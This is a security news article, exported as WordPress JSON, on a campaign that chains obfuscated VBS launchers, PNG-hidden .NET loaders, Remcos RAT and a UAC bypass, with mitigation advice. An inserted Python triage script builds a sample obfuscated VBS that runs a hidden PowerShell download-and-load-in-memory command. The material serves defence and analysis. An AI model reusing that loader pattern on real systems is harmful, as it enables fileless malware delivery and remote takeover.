{"id":11622,"date":"2026-03-26T10:03:40","date_gmt":"2026-03-26T10:03:40","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/03\/26\/open-directory-malware-campaign-uses-obfuscated-vbs-png-loaders-and-rat-payloads\/"},"modified":"2026-03-26T10:03:40","modified_gmt":"2026-03-26T10:03:40","slug":"open-directory-malware-campaign-uses-obfuscated-vbs-png-loaders-and-rat-payloads","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/03\/26\/open-directory-malware-campaign-uses-obfuscated-vbs-png-loaders-and-rat-payloads\/","title":{"rendered":"Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads"},"content":{"rendered":"<div>\n<p>A multi-stage malware campaign has surfaced that chains obfuscated Visual Basic Script (VBS) launchers, loaders hidden inside PNG images, and remote access trojans (RATs). Beyond the initial script, the later stages run in memory and leave few file artifacts on disk. 
<\/p>\n<p>What began as a routine endpoint detection in early 2026 quickly proved to be far more organized than a single opportunistic attack: it exposed a reusable delivery framework that pushes different malware payloads through separate attack chains from one shared set of infrastructure.<\/p>\n<p>The first sign of the campaign was a suspicious VBS file named\u00a0<code>Name_File.vbs<\/code>, found in the\u00a0<code>Users\\Public\\Downloads<\/code>\u00a0directory of a compromised endpoint. <\/p>\n<p>SentinelOne endpoint protection caught and quarantined the file before it could fully run. Even so, the encoded content inside the script warranted a closer look. <\/p>\n<p>When decoded, it exposed a Base64-encoded <a href=\"https:\/\/cybersecuritynews.com\/new-yurei-ransomware-with-powershell-commands\/\" id=\"126128\" target=\"_blank\" rel=\"noreferrer noopener\">PowerShell command<\/a> that referenced external hosts, a clear signal that the file was designed to pull additional components from a remote server.<\/p>\n<p><a 
href=\"https:\/\/www.levelblue.com\/blogs\/spiderlabs-blog\/tracing-a-multi-vector-malware-campaign-from-vbs-to-open-infrastructure\" id=\"https:\/\/www.levelblue.com\/blogs\/spiderlabs-blog\/tracing-a-multi-vector-malware-campaign-from-vbs-to-open-infrastructure\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">LevelBlue analysts identified that this single endpoint alert<\/a> was a window into a much larger operation. <\/p>\n<p>The investigation, carried out by LevelBlue\u2019s SpiderLabs Cyber Threat Intelligence team, uncovered an attacker-controlled domain hosting multiple obfuscated VBS files, each linked to a different malware payload, including XWorm variants and Remcos RAT stored as text files. <\/p>\n<p>A separate infection chain tied to a fake PDF was also active on the same infrastructure, confirming the campaign\u2019s deliberate, multi-vector design.<\/p>\n<p>The attacker\u2019s infrastructure centered on openly browsable directories on the domain\u00a0<code>news4me[.]xyz<\/code>, including\u00a0<code>\/coupon\/<\/code>,\u00a0<code>\/protector\/<\/code>, and\u00a0<code>\/invoice\/<\/code>. <\/p>\n<p>Each directory served a distinct role: staging VBS launchers, hosting obfuscated payload files, or delivering entirely separate infection vectors. <\/p>\n<p>This open-directory setup was not accidental. It let the attacker update, rotate, or expand hosted payloads without modifying the core delivery logic, a flexible, scalable system that stays operational even after one launcher or payload is detected. The same openness cuts the other way: a browsable listing lets defenders enumerate every hosted file and extract indicators for the whole campaign from a single quarantined sample.<\/p>\n<h2 class=\"wp-block-heading\" id=\"inside-the-infection-mechanism-vbs-to-in-memory-ra\"><strong>Inside the Infection Mechanism: VBS to In-Memory RAT Execution<\/strong><\/h2>\n<p>The infection begins with a VBS file that acts purely as a launcher, carrying no active malicious code of its own. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhdrNREh90qexqQHDdg0u_XUd0AKWGia6QCTIiKOQ5ki_bRD5b5ZZKxC4V3mEhZR9aFWDOiwXWxu7m4SH66np7k_A6mt7A7tHZwLfndWl1TOCKryPJ6XQE4riGIzypHgIVgVkT8Xth5QinBNZhV4pIVUx3sim-FWOaIIjZopR6CbXWvTZ3_IjP_MA8mqS4\/s16000\/Name_File.vbs%2520content%2520%28Source%2520-%2520LevelBlue%29.webp?ssl=1\" alt=\"Name_File.vbs content (Source - LevelBlue)\"><figcaption class=\"wp-element-caption\">Name_File.vbs content (Source \u2013 LevelBlue)<\/figcaption><\/figure>\n<\/div>\n<p>The script is buried beneath layers of Unicode obfuscation. 
Stripping those characters exposes the real script: a Base64-encoded PowerShell command that is the true engine of the attack.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhPEK8A3lyMEKF67_EOkYa4PQ4coZ4khyphenhyphenLyTWy8qfvKQ0jKJNfMxJ-OavDebbmHIiiUNox8kTOVEJeXqw_BYIpCDiKmeaZdKiwyy5on086q1gy9oqbOcvYyiWHEWNX4ylNA5N9lxBeB4Gc-wCV5hcdg9KhsC-V790oaoE9MOdFlhMEMvWG3dsuFgCAoy2A\/s16000\/Name_File.vbs%25C2%25A0Unicode%2520removal%2520%28Source%2520-%2520LevelBlue%29.webp?ssl=1\" alt=\"Name_File.vbs\u00a0Unicode removal (Source - LevelBlue)\"><figcaption class=\"wp-element-caption\">Name_File.vbs\u00a0Unicode removal (Source \u2013 LevelBlue)<\/figcaption><\/figure>\n<\/div>\n<p>That PowerShell command functions as a fileless loader. It forces the connection to TLS 1.2 and uses the\u00a0<code>Net.WebClient<\/code>\u00a0class to fetch a remote file from an Internet Archive URL, a legitimate hosting service that is rarely blocked by web filters.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhWhX8e5a8pNhiaAIbnL98m7Fabb2jXpxycu5JNi1-dVG_LrGbT01_XBGR7RBWEiixdrpe3EFpV-NYEftP53LsyHtslnP2iey0Fj9gvcMsLwf4yS3LhvY65ss-GBuGC2y1M-PaG7avT6WcHigCgpOui3x7c5pSMYQjDHkFAdO4zWnxIwbt4u5tzpzbFg0E\/s16000\/Name_File.vbs%25C2%25A0decoded%2520PowerShell%2520command%2520%28Source%2520-%2520LevelBlue%29.webp?ssl=1\" alt=\"Name_File.vbs\u00a0decoded PowerShell command (Source - LevelBlue)\"><figcaption class=\"wp-element-caption\">Name_File.vbs\u00a0decoded PowerShell command (Source \u2013 LevelBlue)<\/figcaption><\/figure>\n<\/div>\n<p>Instead of pulling a traditional executable, it downloads a PNG image,\u00a0<code>MSI_PRO_with_b64.png<\/code>. 
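<\/p>\n<p>The steps in this section (strip the Unicode filler from the VBS, Base64-decode the PowerShell it launches, pull the Base64 blob out of the downloaded PNG by its start and end markers, and decode that blob into a .NET assembly) can be replayed offline when triaging a sample. The Python below is an added example written for this page, not code from LevelBlue, SentinelOne or the campaign itself. The <code>BaseStart<\/code> and <code>BaseEnd<\/code> marker names come from the article; the zero-width filler style, the PowerShell command text, the archive.org URL, the PNG bytes and the PE stub are all constructed inline so that it runs with no network access, and the function names (<code>triage<\/code>, <code>carve_assembly<\/code>, <code>is_pe<\/code>) are this example's own.<\/p>\n

```python
# Added example for this page, not LevelBlue's or the campaign's code. Every input
# below (filler characters, PowerShell text, PNG bytes, PE stub) is constructed.
import base64
import hashlib
import re
import struct
import zlib
from typing import List, Optional

BASE_START = b"BaseStart"   # marker names as reported in the article
BASE_END = b"BaseEnd"
# Strings a decoded loader of this kind is expected to contain (assumed list).
INDICATORS = ("SecurityProtocol", "Net.WebClient", "DownloadString", "DownloadData",
              "archive.org", "FromBase64String", "Reflection.Assembly", "BaseStart")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # what powershell -enc receives

def strip_unicode_filler(text: str) -> str:
    """Keep printable ASCII and line breaks only. Assumes the VBS obfuscation is
    Unicode filler (zero-width or look-alike characters) mixed into ASCII script."""
    return "".join(ch for ch in text if ch.isascii() and (ch.isprintable() or ch in "\r\n\t"))

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand carries UTF-16LE text; the NUL in byte 1 gives that away."""
    raw = base64.b64decode(b64)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")

def extract_powershell(vbs_text: str) -> Optional[str]:
    """Decoded PowerShell launched by an obfuscated VBS, or None if no Base64 run."""
    match = B64_RUN.search(strip_unicode_filler(vbs_text))
    return decode_encoded_command(match.group(0)) if match else None

def loader_indicators(script: str) -> List[str]:
    lowered = script.lower()
    return [i for i in INDICATORS if i.lower() in lowered]

def carve_assembly(png: bytes) -> Optional[bytes]:
    """Base64-decode whatever sits between the markers; None if absent or invalid."""
    start = png.find(BASE_START)
    if start < 0:
        return None
    end = png.find(BASE_END, start + len(BASE_START))
    if end < 0:
        return None
    try:
        return base64.b64decode(png[start + len(BASE_START):end].strip(), validate=True)
    except ValueError:          # binascii.Error is a ValueError
        return None

def is_pe(data: bytes) -> bool:
    """MZ header and a PE signature at e_lfanew (the DWORD at offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def triage(vbs_text: str, png_bytes: bytes) -> dict:
    """One call per sample: decoded command, matched indicators, carved-assembly facts."""
    ps = extract_powershell(vbs_text)
    asm = carve_assembly(png_bytes)
    return {
        "powershell": ps,
        "indicators": loader_indicators(ps) if ps else [],
        "assembly_is_pe": asm is not None and is_pe(asm),
        "assembly_sha256": hashlib.sha256(asm).hexdigest() if asm else None,
    }

# ---- constructed sample input; the URL and command text are placeholders ----
SAMPLE_PS = ("[Net.ServicePointManager]::SecurityProtocol='Tls12';"
             "$wc=New-Object Net.WebClient;"
             "$s=$wc.DownloadString('https://archive.org/download/EXAMPLE/MSI_PRO_with_b64.png');"
             "$b=$s.Substring($s.IndexOf('BaseStart')+9,$s.IndexOf('BaseEnd')-$s.IndexOf('BaseStart')-9);"
             "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))")
ENC = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode()
_FILLER = "\u200b\u200c\u200d\ufeff"        # zero-width characters, assumed filler style

def _obfuscate(text: str) -> str:
    return "".join(ch + _FILLER[i % len(_FILLER)] for i, ch in enumerate(text))

SAMPLE_VBS = _obfuscate('Set sh = CreateObject("WScript.Shell")\r\n'
                        'sh.Run "powershell -nop -w hidden -enc ' + ENC + '", 0, False\r\n')

def _png_chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data))

# 60-byte DOS stub, e_lfanew = 0x40, then the PE signature: enough to satisfy is_pe().
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20
SAMPLE_PNG = (b"\x89PNG\r\n\x1a\n"
              + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
              + _png_chunk(b"IEND", b"")
              + b"\n" + BASE_START + base64.b64encode(FAKE_PE) + BASE_END)

if __name__ == "__main__":
    print(triage(SAMPLE_VBS, SAMPLE_PNG))
```

\n<p>Against a real sample, pass the quarantined VBS text and the fetched PNG to <code>triage()<\/code>: the indicator list tells you whether the decoded command matches this loader pattern, the SHA-256 is the value to pivot on in threat-intelligence portals, and <code>is_pe()<\/code> returning false means the markers wrapped something other than a bare assembly, for example a blob with a further obfuscation layer.<\/p>\n<p>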
The file looks ordinary, but hidden inside it, between custom\u00a0<code>BaseStart<\/code>\u00a0and\u00a0<code>BaseEnd<\/code>\u00a0markers, is a Base64-encoded .NET assembly. The PNG wrapper keeps the download looking like an image to content filters, and the markers let the loader locate the payload without parsing the image at all. <\/p>\n<p>This assembly, known as PhantomVAI, is loaded directly into memory via\u00a0<code>Reflection.Assembly::Load<\/code>; it runs entirely in RAM and bypasses most file-based security controls. The decoded PowerShell is still visible to script block logging, which is where defenders are most likely to see this stage.<\/p>\n<p>Once running, PhantomVAI passes two URLs into its VAI method for follow-on execution. The first,\u00a0<code>news4me[.]xyz\/protector\/johnremcos.txt<\/code>, contains an <a href=\"https:\/\/cybersecuritynews.com\/ai-based-obfuscated-malicious-apps-evading-av-detection\/\" id=\"133994\" target=\"_blank\" rel=\"noreferrer noopener\">obfuscated string<\/a> that decodes into a working instance of Remcos RAT, giving the attacker remote access to the machine. <\/p>\n<p>The second URL delivers\u00a0<code>uac.png<\/code>, a PNG file carrying a UAC bypass DLL in the same marker-delimited format, designed to silently escalate privileges. Together, these payloads hand the attacker full control while leaving virtually no traditional file artifacts behind.<\/p>\n<p>Organizations 
should block execution of\u00a0<code>.vbs<\/code>\u00a0and\u00a0<code>.bat<\/code>\u00a0files from user-writable directories such as\u00a0<code>Users\\Public<\/code>\u00a0(AppLocker or WDAC script rules, or reassociating the extension away from wscript.exe), enable PowerShell Constrained Language Mode where it does not break administration, and turn on script block logging (event ID 4104), which records the decoded command even though the loader never writes a script to disk. <\/p>\n<p>At the network level, blocking WebDAV-based connections and filtering\u00a0<code>.xyz<\/code>\u00a0top-level domains can limit access to the attacker infrastructure identified in this campaign. Note that the first-stage PNG came from the Internet Archive, so domain filtering alone does not break the chain. <\/p>\n<p><a href=\"https:\/\/cybersecuritynews.com\/endpoint-protection-platform\/\" id=\"84841\" target=\"_blank\" rel=\"noreferrer noopener\">Endpoint protection<\/a> must be paired with deeper threat intelligence investigation: stopping one alert is not sufficient when the broader infrastructure remains active and ready to deploy from alternate vectors.<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/open-directory-malware-campaign\/\">Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p>Tushar Subhra Dutta<br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/open-directory-malware-campaign\/\">Go to cyber-security-news<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Open Directory Malware Campaign Uses Obfuscated VBS, PNG Loaders and RAT Payloads A sophisticated multi-stage malware campaign has surfaced, deploying obfuscated Visual Basic Script (VBS) files, PNG-embedded loaders, and remote access trojans (RATs) to target systems without leaving a trace on disk. What began as a routine endpoint detection in early 2026 quickly revealed itself [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-11622","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/11622"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=11622"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/11622\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=11622"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=11622"},{"taxonomy":"post_tag","embeddable":true,"
href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=11622"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}